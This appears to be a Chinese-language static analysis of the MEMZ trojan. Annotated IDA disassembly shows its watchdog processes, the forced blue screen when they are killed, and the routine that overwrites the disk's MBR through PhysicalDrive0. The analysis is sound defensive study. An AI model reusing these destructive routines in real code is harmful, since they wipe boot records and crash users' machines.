2022-01-05病毒分析0


环境

系统:Windows 7 Service Pack 1
分析工具: IDA x32

一、简要分析

运行病毒样本后会弹出两个警告弹窗,告知用户运行病毒的风险,点击确定后开始运行病毒。

点击完确定后弹出notepad

并且系统开始抽风,打开任务管理器可以看到有6个病毒程序的进程

同时自动弹出浏览器,鼠标晃动,窗口变色及播放各种警告音

如果结束病毒程序进程或者重启,就会触发大量弹窗,并蓝屏,接着再次运行系统就会无限循环播放彩虹猫动画。


以上就是整个病毒运行过程了。

二、详细分析(静态)

第一部分 start

程序会调用GetSystemMetrics函数分别获取屏幕的宽度及高度,还会获取命令行参数;由于刚开始运行时没有参数,所以会跳转到loc_40144F。

loc_40144F会有两个弹窗告知用户运行病毒的风险,并判断用户是否点击确定。如果两个弹窗都点了确定,就会调用LocalAlloc从堆中分配指定大小的字节数,接着获取当前进程已加载模块的文件的完整路径,然后循环5次调用ShellExecuteW启动参数为/watchdog的MEMZ进程,再调用ShellExecuteExW启动1次参数为/main的MEMZ进程,所以我们在简要分析的任务管理器中看到的6个病毒进程就是这么来的。再接着会调用SetPriorityClass提高/main进程的优先级。

asm
; ---------------------------------------------------------------------------
; start, loc_40144F: reached when no command-line argument was given.
; Two MessageBoxA prompts gate everything below; ebx appears to be 0 in this
; excerpt and is used as the NULL hWnd / NULL pointer argument (its zeroing
; happens in the part of start that is not shown - confirm there).
; Flow: prompt, prompt, allocate path buffer, GetModuleFileNameW, launch
; 5 x "/watchdog" children, launch 1 x "/main" child with its process handle
; kept, raise that child's priority, then fall into the ExitProcess path.
; ---------------------------------------------------------------------------
.text:0040144F loc_40144F:                             ; CODE XREF: start+37↑j
.text:0040144F                 mov     esi, ds:MessageBoxA
.text:00401455                 mov     edi, offset Caption ; "MEMZ"
.text:0040145A                 push    34h ; '4'       ; uType = MB_YESNO | MB_ICONWARNING
.text:0040145C                 push    edi             ; lpCaption
.text:0040145D                 push    offset Text     ; "The software you just executed is consi"...
.text:00401462                 push    ebx             ; hWnd
.text:00401463                 call    esi ; MessageBoxA
.text:00401465                 cmp     eax, 6          ; IDYES
.text:00401468                 jnz     loc_4014F6      ; anything other than "Yes" -> exit path
.text:0040146E                 push    34h ; '4'       ; uType = MB_YESNO | MB_ICONWARNING
.text:00401470                 push    edi             ; lpCaption
.text:00401471                 push    offset aThisIsTheLastW ; "THIS IS THE LAST WARNING!\r\n\r\nTHE CR"...
.text:00401476                 push    ebx             ; hWnd
.text:00401477                 call    esi ; MessageBoxA
.text:00401479                 cmp     eax, 6          ; IDYES
.text:0040147C                 jnz     short loc_4014F6 ; second "No" -> exit path
.text:0040147E                 push    4000h           ; uBytes = 16 KiB buffer for the module path
.text:00401483                 push    40h ; '@'       ; uFlags = LPTR (fixed, zero-initialised)
.text:00401485                 call    ds:LocalAlloc   ; allocate the path buffer; return value is not NULL-checked
.text:0040148B                 push    2000h           ; nSize in WCHARs (matches the 4000h-byte buffer)
.text:00401490                 mov     esi, eax        ; esi = path buffer
.text:00401492                 push    esi             ; lpFilename
.text:00401493                 push    ebx             ; hModule = NULL -> the running executable itself
.text:00401494                 call    ds:GetModuleFileNameW ; full path of this executable -> esi
.text:0040149A                 push    5
.text:0040149C                 pop     edi             ; edi = 5 = number of "/watchdog" children to launch
.text:0040149D
.text:0040149D loc_40149D:                             ; CODE XREF: start+284↓j
.text:0040149D                 push    0Ah             ; nShowCmd = SW_SHOWDEFAULT
.text:0040149F                 push    ebx             ; lpDirectory = NULL
.text:004014A0                 push    offset String2  ; "/watchdog"
.text:004014A5                 push    esi             ; lpFile = own path
.text:004014A6                 push    ebx             ; lpOperation = NULL
.text:004014A7                 push    ebx             ; hwnd = NULL
.text:004014A8                 call    ds:ShellExecuteW ; re-launch self as "<self> /watchdog"; result not checked
.text:004014AE                 sub     edi, 1
.text:004014B1                 jnz     short loc_40149D ; repeat 5 times
.text:004014B3                 lea     eax, [ebp+pExecInfo]
.text:004014B6                 mov     [ebp+pExecInfo.cbSize], 3Ch ; '<' = 60 = sizeof(SHELLEXECUTEINFOW) on 32-bit
.text:004014BD                 push    eax             ; pExecInfo
.text:004014BE                 mov     [ebp+pExecInfo.lpFile], esi ; lpFile = own path
.text:004014C1                 mov     [ebp+pExecInfo.lpParameters], offset aMain ; "/main"
.text:004014C8                 mov     [ebp+pExecInfo.fMask], 40h ; '@' = SEE_MASK_NOCLOSEPROCESS, so hProcess is filled in
.text:004014CF                 mov     [ebp+pExecInfo.hwnd], ebx
.text:004014D2                 mov     [ebp+pExecInfo.lpVerb], ebx
.text:004014D5                 mov     [ebp+pExecInfo.lpDirectory], ebx
.text:004014D8                 mov     [ebp+pExecInfo.hInstApp], ebx
.text:004014DB                 mov     [ebp+pExecInfo.nShow], 0Ah ; SW_SHOWDEFAULT
.text:004014E2                 call    ds:ShellExecuteExW ; launch "<self> /main" once; return value not checked
.text:004014E8                 push    80h ; '€'       ; dwPriorityClass = HIGH_PRIORITY_CLASS
.text:004014ED                 push    [ebp+pExecInfo.hProcess] ; hProcess of the /main child (NULL if ShellExecuteExW failed)
.text:004014F0                 call    ds:SetPriorityClass ; raise the /main child's priority
.text:004014F6
.text:004014F6 loc_4014F6:                             ; CODE XREF: start+23B↑j
.text:004014F6                                         ; start+24F↑j
.text:004014F6                 push    ebx             ; uExitCode (ebx, presumably 0)
.text:004014F7                 jmp     loc_40132B      ; -> ExitProcess: the launcher itself exits here

最后调用ExitProcess退出进程。

第二部分 /watchdog

经过上面start部分之后,程序首先会判断自身是否为以/watchdog为参数启动的MEMZ进程。如果是,就创建线程执行sub_40114A,然后调用RegisterClassEx注册窗口类、CreateWindowEx新建窗口,并进入消息循环。

asm
; ---------------------------------------------------------------------------
; start, "/watchdog" branch.  eax presumably points at the parsed argv array
; (not visible in this excerpt), so [eax+4] is argv[1].  On a match: spawn the
; watchdog thread (sub_40114A), register a window class named "hax" whose
; window procedure is sub_401000, create a 100x100 window and run a message
; loop.  ebx appears to be 0 throughout and serves as every NULL argument.
; IDA has overlaid the SHELLEXECUTEINFO frame names on the WNDCLASSEXA that
; starts at [ebp+pExecInfo.lpVerb]; the field names below are therefore
; misleading - cbSize=30h (=48=sizeof(WNDCLASSEXA)), ".lpParameters" lines up
; with lpfnWndProc and ".anonymous_0" with lpszClassName (confirm offsets).
; ---------------------------------------------------------------------------
.text:0040126A                 push    offset String2  ; "/watchdog"
.text:0040126F                 push    dword ptr [eax+4] ; lpString1 (argv[1], presumably)
.text:00401272                 call    ds:lstrcmpW
.text:00401278                 test    eax, eax        ; 0 = strings equal
.text:0040127A                 jnz     loc_401308      ; not "/watchdog" -> the "/main" branch (loc_401308)
.text:00401280                 push    ebx             ; lpThreadId = NULL
.text:00401281                 push    ebx             ; dwCreationFlags = 0
.text:00401282                 push    ebx             ; lpParameter = NULL
.text:00401283                 push    offset sub_40114A ; lpStartAddress = watchdog thread
.text:00401288                 push    ebx             ; dwStackSize = 0
.text:00401289                 push    ebx             ; lpThreadAttributes = NULL
.text:0040128A                 call    ds:CreateThread ; start the process-count watchdog; handle not kept
.text:00401290                 lea     eax, [ebp+pExecInfo.lpVerb] ; eax = &WNDCLASSEXA (overlaid on the pExecInfo frame)
.text:00401293                 mov     [ebp+pExecInfo.lpVerb], 30h ; '0' -> WNDCLASSEXA.cbSize = 48
.text:0040129A                 mov     esi, offset ClassName ; "hax"
.text:0040129F                 mov     [ebp+pExecInfo.lpParameters], offset sub_401000 ; -> lpfnWndProc = sub_401000; per the text it reacts to a shutdown/restart attempt
.text:004012A6                 push    eax             ; WNDCLASSEXA *
.text:004012A7                 mov     dword ptr [ebp+pExecInfo.anonymous_0], esi ; -> lpszClassName = "hax"
.text:004012AA                 mov     [ebp+pExecInfo.lpFile], ebx ; remaining WNDCLASSEXA fields zeroed
.text:004012AD                 mov     [ebp+pExecInfo.lpDirectory], ebx
.text:004012B0                 mov     [ebp+pExecInfo.nShow], ebx
.text:004012B3                 mov     [ebp+pExecInfo.hInstApp], ebx
.text:004012B6                 mov     [ebp+pExecInfo.lpIDList], ebx
.text:004012B9                 mov     [ebp+pExecInfo.lpClass], ebx
.text:004012BC                 mov     [ebp+pExecInfo.hkeyClass], ebx
.text:004012BF                 mov     [ebp+pExecInfo.dwHotKey], ebx
.text:004012C2                 mov     [ebp+pExecInfo.hProcess], ebx
.text:004012C5                 call    ds:RegisterClassExA ; register window class "hax"; result not checked
.text:004012CB                 push    ebx             ; lpParam
.text:004012CC                 push    ebx             ; hInstance
.text:004012CD                 push    ebx             ; hMenu
.text:004012CE                 push    ebx             ; hWndParent
.text:004012CF                 push    64h ; 'd'       ; nHeight = 100
.text:004012D1                 push    64h ; 'd'       ; nWidth = 100
.text:004012D3                 push    ebx             ; Y
.text:004012D4                 push    ebx             ; X
.text:004012D5                 push    ebx             ; dwStyle = 0 (no WS_VISIBLE)
.text:004012D6                 push    ebx             ; lpWindowName
.text:004012D7                 push    esi             ; lpClassName = "hax"
.text:004012D8                 push    ebx             ; dwExStyle
.text:004012D9                 call    ds:CreateWindowExA ; create the window that receives sub_401000's messages
.text:004012DF                 mov     esi, ds:GetMessageW ; esi = GetMessageW for the loop below
.text:004012E5                 jmp     short loc_4012FB
.text:004012E7 ; ---------------------------------------------------------------------------
.text:004012E7
.text:004012E7 loc_4012E7:                             ; CODE XREF: start+D9↓j
.text:004012E7                 lea     eax, [ebp+Msg]
.text:004012EA                 push    eax             ; lpMsg
.text:004012EB                 call    ds:TranslateMessage
.text:004012F1                 lea     eax, [ebp+Msg]
.text:004012F4                 push    eax             ; lpMsg
.text:004012F5                 call    ds:DispatchMessageW ; -> sub_401000
.text:004012FB
.text:004012FB loc_4012FB:                             ; CODE XREF: start+B8↑j
.text:004012FB                 push    ebx             ; wMsgFilterMax
.text:004012FC                 push    ebx             ; wMsgFilterMin
.text:004012FD                 push    ebx             ; hWnd = NULL (all windows of this thread)
.text:004012FE                 lea     eax, [ebp+Msg]
.text:00401301                 push    eax             ; lpMsg
.text:00401302                 call    esi ; GetMessageW
.text:00401304                 test    eax, eax
.text:00401306                 jg      short loc_4012E7 ; loop while > 0; both 0 (WM_QUIT) and -1 (error) fall through

start时创建了5个/watchdog为参数的MEMZ进程,所以线程也对应了5个

sub_40114A 监测进程及是否主动关机

首先会调用LocalAlloc从堆中分配指定大小的字节数,用于存储路径;然后调用GetCurrentProcess获取当前进程句柄,再调用GetProcessImageFileNameA获取当前进程路径。

接着是一个死循环:调用CreateToolhelp32Snapshot拍摄进程快照,通过Process32FirstW/Process32NextW遍历进程,再通过一个内循环统计病毒进程数量。esi存放本次遍历到的MEMZ进程数量,var_C存放上一次遍历到的MEMZ进程数量;如果esi小于var_C,就说明有病毒进程被关闭,此时调用函数sub_401021。这个函数会先创建20个线程,弹出大量内容和位置都随机的弹窗,然后蓝屏、关机。

asm
; ---------------------------------------------------------------------------
; sub_40114A - "watchdog" thread entry (passed to CreateThread at 401283).
; Each pass takes a process snapshot, counts the processes whose image path
; equals this process's own path (esi), and compares that with the count from
; the previous pass ([ebp+var_C], 0 on the first pass).  A drop in the count
; calls sub_401021 (the blue-screen / shutdown routine described in the text).
; Register roles inside the loops:
;   ebx = own image path (from 4011A7 on), edi = snapshot handle,
;   esi = matches this pass, [ebp+hObject] / [ebp+lpString2] = per-process
;   handle and path buffer, freed at the end of every inner iteration.
; The proc has no epilogue and no ret: the outer loop only ever jumps back to
; while_Begin, so the thread lives as long as the process does.
; Sleep argument: 3E8h (1000 ms) before the first pass, then 0Ah (10 ms)
; pushed at 401226 for every later pass - a tight polling loop, which is
; also what makes this thread noisy (OpenProcess / snapshot calls every 10 ms).
; ---------------------------------------------------------------------------
.text:0040114A sub_40114A      proc near               ; DATA XREF: start+56↓o
.text:0040114A
.text:0040114A pe              = PROCESSENTRY32W ptr -23Ch
.text:0040114A lpString1       = dword ptr -10h
.text:0040114A var_C           = dword ptr -0Ch
.text:0040114A lpString2       = dword ptr -8
.text:0040114A hObject         = dword ptr -4
.text:0040114A lpThreadParameter= dword ptr  8
.text:0040114A
.text:0040114A                 push    ebp
.text:0040114B                 mov     ebp, esp
.text:0040114D                 sub     esp, 23Ch       ; locals: PROCESSENTRY32W + 4 dwords
.text:00401153                 push    ebx
.text:00401154                 push    esi
.text:00401155                 xor     ebx, ebx
.text:00401157                 push    edi
.text:00401158                 mov     [ebp+var_C], ebx ; previous-pass count starts at 0
.text:0040115B                 mov     ebx, 200h       ; ebx = 200h = buffer size (reused as nSize below)
.text:00401160                 push    ebx             ; uBytes = 200h
.text:00401161                 push    40h ; '@'       ; uFlags = LPTR (fixed, zero-initialised)
.text:00401163                 call    ds:LocalAlloc   ; 200h-byte buffer for this process's own image path; not NULL-checked
.text:00401169                 push    ebx             ; nSize = 200h (3rd arg of GetProcessImageFileNameA)
.text:0040116A                 push    eax             ; lpImageFileName = the buffer
.text:0040116B                 mov     [ebp+lpString1], eax ; keep the buffer: it is the comparison key for every pass
.text:0040116E                 call    ds:GetCurrentProcess ; pseudo-handle for the current process
.text:00401174                 push    eax             ; hProcess
.text:00401175                 call    GetProcessImageFileNameA ; own image path -> [lpString1]
.text:0040117A                 push    3E8h            ; dwMilliseconds = 1000 for the FIRST Sleep only
.text:0040117F

               ; outer loop: one full process-snapshot pass per iteration
.text:0040117F while_Begin:                            ; CODE XREF: sub_40114A+DE↓j
.text:0040117F                 call    ds:Sleep        ; 1000 ms on the first pass, 10 ms afterwards (see 401226)
.text:00401185                 push    0               ; th32ProcessID
.text:00401187                 push    2               ; dwFlags = TH32CS_SNAPPROCESS
.text:00401189                 call    CreateToolhelp32Snapshot ; snapshot handle -> edi; not checked for INVALID_HANDLE_VALUE
.text:0040118E                 mov     edi, eax
.text:00401190                 mov     [ebp+pe.dwSize], 22Ch ; 556 = sizeof(PROCESSENTRY32W)
.text:0040119A                 lea     eax, [ebp+pe]
.text:004011A0                 push    eax             ; lppe
.text:004011A1                 push    edi             ; hSnapshot
.text:004011A2                 call    Process32FirstW ; result not checked; the inner loop runs at least once
.text:004011A7                 mov     ebx, [ebp+lpString1] ; ebx = own image path
.text:004011AA                 xor     esi, esi        ; esi = matches found this pass
.text:004011AC
               ; inner loop (do-while): for every process in the snapshot, open it,
               ; read its image path and compare with our own; esi++ on equality
.text:004011AC _dowhile_Begin:                         ; CODE XREF: sub_40114A+C6↓j
.text:004011AC                 push    [ebp+pe.th32ProcessID] ; dwProcessId
.text:004011B2                 push    0               ; bInheritHandle
.text:004011B4                 push    400h            ; dwDesiredAccess = PROCESS_QUERY_INFORMATION
.text:004011B9                 call    ds:OpenProcess  ; may return NULL (e.g. protected/system processes); not checked
.text:004011BF                 push    200h            ; uBytes
.text:004011C4                 push    40h ; '@'       ; uFlags = LPTR
.text:004011C6                 mov     [ebp+hObject], eax ; hObject = process handle (or NULL)
.text:004011C9                 call    ds:LocalAlloc   ; fresh 200h-byte path buffer per process
.text:004011CF                 push    200h            ; nSize
.text:004011D4                 push    eax             ; lpImageFileName
.text:004011D5                 push    [ebp+hObject]   ; hProcess
.text:004011D8                 mov     [ebp+lpString2], eax
.text:004011DB                 call    GetProcessImageFileNameA ; path of the inspected process -> [lpString2]
.text:004011E0                 push    [ebp+lpString2] ; lpString2 = inspected process's path
.text:004011E3                 push    ebx             ; lpString1 = own path
.text:004011E4                 call    ds:lstrcmpA
.text:004011EA                 test    eax, eax        ; 0 = same image path
.text:004011EC                 jnz     short loc_4011EF
.text:004011EE                 inc     esi            ; match -> one more MEMZ process
.text:004011EF
.text:004011EF loc_4011EF:                             ; CODE XREF: sub_40114A+A2↑j
.text:004011EF                 push    [ebp+hObject]   ; hObject
.text:004011F2                 call    ds:CloseHandle
.text:004011F8                 push    [ebp+lpString2] ; hMem
.text:004011FB                 call    ds:LocalFree
.text:00401201                 lea     eax, [ebp+pe]
.text:00401207                 push    eax             ; lppe
.text:00401208                 push    edi             ; hSnapshot
.text:00401209                 call    Process32NextW
.text:0040120E                 test    eax, eax
.text:00401210                 jnz     short _dowhile_Begin ; more processes -> continue
.text:00401212                 push    edi             ; hObject = snapshot
.text:00401213                 call    ds:CloseHandle
.text:00401219                 cmp     esi, [ebp+var_C]    ; this pass vs. previous pass (signed compare)
.text:0040121C                 jge     short loc_401223    ; count did not drop -> skip
.text:0040121E                 call    sub_401021      ; count dropped -> blue-screen / shutdown routine
.text:00401223
.text:00401223 loc_401223:                             ; CODE XREF: sub_40114A+D2↑j
.text:00401223                 mov     [ebp+var_C], esi    ; remember this pass's count
.text:00401226                 push    0Ah             ; dwMilliseconds = 10 for every later Sleep
.text:00401228                 jmp     while_Begin     ; back to Sleep(10 ms) - NOT 1 s from here on
.text:00401228 sub_40114A      endp

sub_401021 蓝屏关机

进入函数后,直接创建了20个线程,每次间隔0.1秒,线程函数为StartAddress。

接着RtlAdjustPrivilege提权后NtRaiseHardError制造系统蓝屏

然后通过OpenProcessToken获取进程token,再用AdjustTokenPrivileges调整token特权,最后使用ExitWindowsEx注销系统。

StartAddress
首先会安装钩子,回调函数为fn;然后使用sub_401A55获取随机数。lpText指向的地址中保存了26条消息,随机数对0x1A取余后的结果存放在edx寄存器,以此在26条消息中随机选取一条通过MessageBoxA弹出显示。
、

lpText

sub_401A55
随机数函数

sub_401000 主动关机或重启

回调函数,如果用户主动关机或重启就会调用上面的蓝屏关机函数

如果参数带有/watchdog,就创建线程判断当前病毒程序的进程是否被结束;如果数量不对,就调用蓝屏关机函数;如果用户尝试关机或重启,同样会调用蓝屏关机函数。

第三部分 /main

/main 部分刚开始就会调用CreateFileA以读写权限打开\\\\.\\PhysicalDrive0主硬盘,并且覆盖系统原来的MBR,改成自己的恶意代码,也就是我们运行完病毒,重启时会出现的魔性的彩虹猫动画的来源了。

asm
; ---------------------------------------------------------------------------
; start, "/main" branch: open the raw disk device "\\.\PhysicalDrive0" for
; read/write, build a 10000h-byte image in a LocalAlloc buffer (esi) from two
; embedded blobs, and write it to the device in one WriteFile call.  No
; SetFilePointer appears in this excerpt, so the write starts at offset 0 of
; the device, i.e. over the MBR (as the text states).  Exit codes on failure:
; 2 = CreateFileA failed, 3 = WriteFile failed (both via loc_40132B).
; From a defender's view a user-mode handle to \\.\PhysicalDrive0 with
; GENERIC_WRITE followed by a 64 KiB WriteFile is the high-signal event here.
; ---------------------------------------------------------------------------
.text:00401308 loc_401308:                             ; CODE XREF: start+4D↑j
.text:00401308                 push    ebx             ; hTemplateFile = NULL
.text:00401309                 push    ebx             ; dwFlagsAndAttributes = 0
.text:0040130A                 push    3               ; dwCreationDisposition = OPEN_EXISTING
.text:0040130C                 push    ebx             ; lpSecurityAttributes = NULL
.text:0040130D                 push    3               ; dwShareMode = FILE_SHARE_READ | FILE_SHARE_WRITE
.text:0040130F                 push    0C0000000h      ; dwDesiredAccess = GENERIC_READ | GENERIC_WRITE
.text:00401314                 push    offset FileName ; "\\\\.\\PhysicalDrive0"
.text:00401319                 call    ds:CreateFileA  ; raw device handle -> ebx (requires admin rights to succeed)
.text:0040131F                 mov     ebx, eax
.text:00401321                 mov     [ebp+hObject], ebx
.text:00401324                 cmp     ebx, 0FFFFFFFFh ; INVALID_HANDLE_VALUE
.text:00401327                 jnz     short loc_401331
.text:00401329                 push    2               ; uExitCode = 2: could not open the device
.text:0040132B
.text:0040132B loc_40132B:                             ; CODE XREF: start+170↓j
.text:0040132B                                         ; start+1A3↓j ...
.text:0040132B                 call    ds:ExitProcess  ; shared exit point for every branch of start
.text:00401331 ; ---------------------------------------------------------------------------
.text:00401331
.text:00401331 loc_401331:                             ; CODE XREF: start+FA↑j
.text:00401331                 push    10000h          ; uBytes = 64 KiB
.text:00401336                 push    40h ; '@'       ; uFlags = LPTR (zero-initialised)
.text:00401338                 call    ds:LocalAlloc   ; esi = write buffer; not NULL-checked
.text:0040133E                 xor     edi, edi        ; edi = byte counter for loop 1
.text:00401340                 mov     esi, eax
.text:00401342                 cmp     ds:dword_4029E8, edi ; dword_4029E8 = length of blob 1 (unsigned)
.text:00401348                 jbe     short loc_401362 ; zero length -> skip loop 1
.text:0040134A                 mov     edx, offset byte_402118 ; blob 1 source
.text:0040134F                 mov     ecx, esi        ; ecx = destination cursor
.text:00401351                 sub     edx, esi        ; edx = src - dst, so [edx+ecx] walks the source in step with ecx
.text:00401353
.text:00401353 loc_401353:                             ; CODE XREF: start+133↓j
.text:00401353                 mov     al, [edx+ecx]   ; al = byte_402118[edi]
.text:00401356                 inc     edi
.text:00401357                 mov     [ecx], al       ; buffer[edi] = al
.text:00401359                 inc     ecx
.text:0040135A                 cmp     edi, ds:dword_4029E8
.text:00401360                 jb      short loc_401353 ; loop 1: copy blob 1 to buffer offset 0
.text:00401362
.text:00401362 loc_401362:                             ; CODE XREF: start+11B↑j
.text:00401362                 xor     ecx, ecx        ; ecx = byte counter for loop 2
.text:00401364                 cmp     ds:dword_4029EC, ecx ; dword_4029EC = length of blob 2 (unsigned)
.text:0040136A                 jbe     short loc_401382
.text:0040136C
.text:0040136C loc_40136C:                             ; CODE XREF: start+153↓j
.text:0040136C                 mov     al, ds:byte_402248[ecx] ; blob 2 source
.text:00401372                 mov     [esi+ecx+1FEh], al ; buffer[1FEh + ecx]: starts at the last 2 bytes of sector 0
.text:00401379                 inc     ecx
.text:0040137A                 cmp     ecx, ds:dword_4029EC
.text:00401380                 jb      short loc_40136C ; loop 2: copy blob 2 to buffer offset 1FEh
.text:00401382
.text:00401382 loc_401382:                             ; CODE XREF: start+13D↑j
.text:00401382                 push    0               ; lpOverlapped
.text:00401384                 lea     eax, [ebp+NumberOfBytesWritten]
.text:00401387                 push    eax             ; lpNumberOfBytesWritten (value never examined)
.text:00401388                 push    10000h          ; nNumberOfBytesToWrite = the whole 64 KiB buffer
.text:0040138D                 push    esi             ; lpBuffer
.text:0040138E                 push    ebx             ; hFile = device handle
.text:0040138F                 mov     ebx, ds:WriteFile ; ebx now holds WriteFile (reused by the note.txt code that follows)
.text:00401395                 call    ebx ; WriteFile
.text:00401397                 test    eax, eax
.text:00401399                 jnz     short loc_40139F
.text:0040139B                 push    3               ; uExitCode = 3: device write failed
.text:0040139D                 jmp     short loc_40132B
.text:0040139F ; ---------------------------------------------------------------------------
.text:0040139F
.text:0040139F loc_40139F:                             ; CODE XREF: start+16C↑j
.text:0040139F                 push    [ebp+hObject]   ; hObject = device handle
.text:004013A2                 mov     edi, ds:CloseHandle ; edi = CloseHandle (reused below)
.text:004013A8                 call    edi ; CloseHandle

覆盖完MBR之后,会创建\\note.txt,并写入文字提示后,用notepad.exe打开note.txt文件。

asm
; ---------------------------------------------------------------------------
; start, "/main" branch continued (directly follows 4013A8): create "\note.txt"
; on the root of the current drive, write the embedded message into it and
; open it with notepad.  ebx still holds WriteFile and edi CloseHandle from
; the preceding code.  Exit codes: 4 = CreateFileA failed, 5 = WriteFile failed.
; ---------------------------------------------------------------------------
.text:004013AA                 push    0               ; hTemplateFile
.text:004013AC                 push    80h ; '€'       ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
.text:004013B1                 push    2               ; dwCreationDisposition = CREATE_ALWAYS (overwrites an existing file)
.text:004013B3                 push    0               ; lpSecurityAttributes
.text:004013B5                 push    3               ; dwShareMode = FILE_SHARE_READ | FILE_SHARE_WRITE
.text:004013B7                 push    0C0000000h      ; dwDesiredAccess = GENERIC_READ | GENERIC_WRITE
.text:004013BC                 push    offset Parameters ; "\\note.txt" - root-relative path on the current drive
.text:004013C1                 call    ds:CreateFileA
.text:004013C7                 mov     esi, eax        ; esi = file handle
.text:004013C9                 cmp     esi, 0FFFFFFFFh ; INVALID_HANDLE_VALUE
.text:004013CC                 jnz     short loc_4013D5
.text:004013CE                 push    4               ; uExitCode = 4: could not create note.txt
.text:004013D0                 jmp     loc_40132B      ; -> ExitProcess
.text:004013D5 ; ---------------------------------------------------------------------------
.text:004013D5
.text:004013D5 loc_4013D5:                             ; CODE XREF: start+19F↑j
.text:004013D5                 push    0               ; lpOverlapped
.text:004013D7                 lea     eax, [ebp+NumberOfBytesWritten]
.text:004013DA                 push    eax             ; lpNumberOfBytesWritten (value never examined)
.text:004013DB                 push    ds:nNumberOfBytesToWrite ; nNumberOfBytesToWrite = length of the message, from a global
.text:004013E1                 push    offset aYourComputerHa ; "YOUR COMPUTER HAS BEEN FUCKED BY THE ME"...
.text:004013E6                 push    esi             ; hFile
.text:004013E7                 call    ebx ; WriteFile
.text:004013E9                 test    eax, eax
.text:004013EB                 jnz     short loc_4013F4
.text:004013ED                 push    5               ; uExitCode = 5: write to note.txt failed
.text:004013EF                 jmp     loc_40132B      ; -> ExitProcess
.text:004013F4 ; ---------------------------------------------------------------------------
.text:004013F4
.text:004013F4 loc_4013F4:                             ; CODE XREF: start+1BE↑j
.text:004013F4                 push    esi             ; hObject
.text:004013F5                 call    edi ; CloseHandle
.text:004013F7                 push    0Ah             ; nShowCmd = SW_SHOWDEFAULT
.text:004013F9                 xor     ebx, ebx        ; ebx = 0 again, used as NULL below
.text:004013FB                 push    ebx             ; lpDirectory = NULL
.text:004013FC                 push    offset Parameters ; "\\note.txt" passed as lpParameters
.text:00401401                 push    offset File     ; "notepad"
.text:00401406                 push    ebx             ; lpOperation = NULL
.text:00401407                 push    ebx             ; hwnd = NULL
.text:00401408                 call    ds:ShellExecuteA ; open note.txt in notepad; result not checked

接着调用CreateThread创建10个线程,依次使用off_405130处的10个函数指针作为线程函数。

线程1:

随机运行浏览器、计算器、记事本、cmd、任务管理器、注册表编辑器等等。

asm
; ---------------------------------------------------------------------------
; Pointer table at .data:00405000, read by sub_4014FC (thread 1) via the
; DATA XREF below.  46 dword entries (00405000h..004050B4h): 34 URLs followed
; by 12 program names.  The defining line of the first entry (00405000h,
; "http://google.co.ck/search?q=best+way+t"...) is not reproduced in this
; excerpt - only its continuation comment survives.  The text says thread 1
; picks an entry at random; the selection code itself is not shown here.
; ---------------------------------------------------------------------------
.data:00405000                                         ; DATA XREF: sub_4014FC+18↑r
.data:00405000                                         ; "http://google.co.ck/search?q=best+way+t"...
.data:00405004                 dd offset aHttpGoogleCoCk_0 ; "http://google.co.ck/search?q=how+2+remo"...
.data:00405008                 dd offset aHttpGoogleCoCk_1 ; "http://google.co.ck/search?q=mcafee+vs+"...
.data:0040500C                 dd offset aHttpGoogleCoCk_2 ; "http://google.co.ck/search?q=how+to+sen"...
.data:00405010                 dd offset aHttpGoogleCoCk_3 ; "http://google.co.ck/search?q=minecraft+"...
.data:00405014                 dd offset aHttpGoogleCoCk_4 ; "http://google.co.ck/search?q=how+to+get"...
.data:00405018                 dd offset aHttpGoogleCoCk_5 ; "http://google.co.ck/search?q=bonzi+budd"...
.data:0040501C                 dd offset aHttpGoogleCoCk_6 ; "http://google.co.ck/search?q=how+2+buy+"...
.data:00405020                 dd offset aHttpGoogleCoCk_7 ; "http://google.co.ck/search?q=how+to+cod"...
.data:00405024                 dd offset aHttpGoogleCoCk_8 ; "http://google.co.ck/search?q=what+happe"...
.data:00405028                 dd offset aHttpGoogleCoCk_9 ; "http://google.co.ck/search?q=g3t+r3kt"
.data:0040502C                 dd offset aHttpGoogleCoCk_10 ; "http://google.co.ck/search?q=batch+viru"...
.data:00405030                 dd offset aHttpGoogleCoCk_11 ; "http://google.co.ck/search?q=virus.exe"
.data:00405034                 dd offset aHttpGoogleCoCk_12 ; "http://google.co.ck/search?q=internet+e"...
.data:00405038                 dd offset aHttpGoogleCoCk_13 ; "http://google.co.ck/search?q=facebook+h"...
.data:0040503C                 dd offset aHttpGoogleCoCk_14 ; "http://google.co.ck/search?q=virus+buil"...
.data:00405040                 dd offset aHttpGoogleCoCk_15 ; "http://google.co.ck/search?q=how+to+cre"...
.data:00405044                 dd offset aHttpGoogleCoCk_16 ; "http://google.co.ck/search?q=how+to+rem"...
.data:00405048                 dd offset aHttpGoogleCoCk_17 ; "http://google.co.ck/search?q=my+compute"...
.data:0040504C                 dd offset aHttpGoogleCoCk_18 ; "http://google.co.ck/search?q=dank+memz"
.data:00405050                 dd offset aHttpGoogleCoCk_19 ; "http://google.co.ck/search?q=how+to+dow"...
.data:00405054                 dd offset aHttpGoogleCoCk_20 ; "http://google.co.ck/search?q=half+life+"...
.data:00405058                 dd offset aHttpGoogleCoCk_21 ; "http://google.co.ck/search?q=is+illumin"...
.data:0040505C                 dd offset aHttpGoogleCoCk_22 ; "http://google.co.ck/search?q=montage+pa"...
.data:00405060                 dd offset aHttpGoogleCoCk_23 ; "http://google.co.ck/search?q=the+memz+a"...
.data:00405064                 dd offset aHttpGoogleCoCk_24 ; "http://google.co.ck/search?q=stanky+dan"...
.data:00405068                 dd offset aHttpGoogleCoCk_25 ; "http://google.co.ck/search?q=john+cena+"...
.data:0040506C                 dd offset aHttpGoogleCoCk_26 ; "http://google.co.ck/search?q=vinesauce+"...
.data:00405070                 dd offset aHttpGoogleCoCk_27 ; "http://google.co.ck/search?q=skrillex+s"...
.data:00405074                 dd offset aHttpAnswersMic ; "http://answers.microsoft.com/en-us/prot"...
.data:00405078                 dd offset aHttpMotherboar ; "http://motherboard.vice.com/read/watch-"...
.data:0040507C                 dd offset aHttpPlayClubpe ; "http://play.clubpenguin.com"
.data:00405080                 dd offset aHttpPcoptimize ; "http://pcoptimizerpro.com"
.data:00405084                 dd offset aHttpSoftonicCo ; "http://softonic.com"
; --- from here on: local program names (opened the same way as the URLs) ---
.data:00405088                 dd offset aCalc         ; "calc"
.data:0040508C                 dd offset File          ; "notepad" (same string the note.txt code uses)
.data:00405090                 dd offset aCmd          ; "cmd"
.data:00405094                 dd offset aWrite        ; "write"
.data:00405098                 dd offset aRegedit      ; "regedit"
.data:0040509C                 dd offset aExplorer     ; "explorer"
.data:004050A0                 dd offset aTaskmgr      ; "taskmgr"
